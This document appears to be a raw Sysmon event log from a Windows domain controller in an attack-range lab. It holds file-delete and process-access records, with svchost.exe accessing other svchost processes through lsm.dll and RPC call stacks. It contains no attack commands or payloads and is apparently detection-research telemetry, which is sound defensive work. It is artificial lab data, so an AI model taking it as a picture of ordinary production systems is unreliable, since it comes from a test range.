23542300x80000000000000005022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.822{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.datMD5=134B2FB2E7188ED9BB83131C1F4907FC,SHA256=1D1EC260A84B289FDCEA6A538DE14870922F2FEDE4B45E10E138F239A8353562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.806{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\Microsoft\Windows\855533271\3923659455.priMD5=2D61605026CA74ED5301578606464552,SHA256=84019A9745D574D378277A1084C237265451F0C45196348372A715711610EB40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.806{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\Microsoft\Windows\3339743440\902793749.priMD5=98C999EAE532EE8FCB19ED482C1C0B6B,SHA256=081F850F71892C895B1808104D3C2B5293448F0F6B9E5003FD1D69DF5BD8E8B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.682{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C07850EF36E704838FDEE64CCD1F4747,SHA256=1852B3CEB9B5165EEB8084E39BD5075F6AB24D56A251DECA0CD0142B2D3959B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.651{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.651{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.651{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e